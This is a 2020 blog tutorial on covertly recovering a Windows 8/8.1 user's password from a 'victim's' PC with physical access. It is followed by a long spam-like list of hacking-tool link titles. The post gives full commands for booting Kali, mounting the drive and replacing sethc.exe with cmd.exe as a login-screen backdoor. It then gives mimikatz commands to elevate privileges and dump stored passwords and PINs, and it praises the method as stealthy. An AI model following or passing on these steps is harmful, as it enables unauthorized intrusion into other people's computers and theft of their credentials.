Wednesday, August 26, 2020

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)
Read more
  1. Hacker Tools Mac
  2. Tools Used For Hacking
  3. Github Hacking Tools
  4. Hacker Tools Github
  5. Nsa Hacker Tools
  6. Hack Tools For Games
  7. Hacker Tools Free Download
  8. Hack Tools
  9. Pentest Tools Alternative
  10. Pentest Tools For Ubuntu
  11. Hack App
  12. Pentest Tools For Mac
  13. Pentest Tools Url Fuzzer
  14. Easy Hack Tools
  15. Hacker Tools For Ios
  16. Hacking Tools Github
  17. Hackrf Tools
  18. Hacker Security Tools
  19. Pentest Tools Website
  20. Ethical Hacker Tools
  21. Hack Tools
  22. Hacker Tools Online
  23. Hacking Tools For Beginners
  24. Pentest Tools For Mac
  25. Hack Tool Apk
  26. Hacking Tools Free Download
  27. Usb Pentest Tools
  28. Pentest Tools Free
  29. Pentest Tools Github
  30. Hacking Tools Pc
  31. Android Hack Tools Github
  32. Hacking Tools Software
  33. Install Pentest Tools Ubuntu
  34. Pentest Tools Free
  35. New Hack Tools
  36. Top Pentest Tools
  37. Hacker Techniques Tools And Incident Handling
  38. Pentest Tools Android
  39. Usb Pentest Tools
  40. Pentest Tools Nmap
  41. Hak5 Tools
  42. Pentest Tools Download
  43. Underground Hacker Sites
  44. Github Hacking Tools
  45. Hacking Tools Name
  46. Hacker Tools Windows
  47. Hacking Tools For Kali Linux
  48. Hacking Tools For Kali Linux
  49. Pentest Box Tools Download
  50. Hacking Tools And Software
  51. Hacking App
  52. New Hacker Tools
  53. Pentest Tools Find Subdomains
  54. Hack Tools Mac
  55. Free Pentest Tools For Windows
  56. Pentest Tools Download
  57. Pentest Automation Tools
  58. Tools Used For Hacking
  59. Pentest Tools Apk
  60. Hack Tools
  61. Hack Tools 2019
  62. Hacking Tools For Windows Free Download
  63. Best Pentesting Tools 2018
  64. Hack Tools Online
  65. Hack Tools Mac
  66. Tools Used For Hacking
  67. Hacker Security Tools
  68. Pentest Tools Online
  69. Pentest Tools Online
  70. Hacker Tools 2019
  71. Pentest Tools Free
  72. Hacker Tool Kit
  73. Pentest Tools Website

No comments:

Post a Comment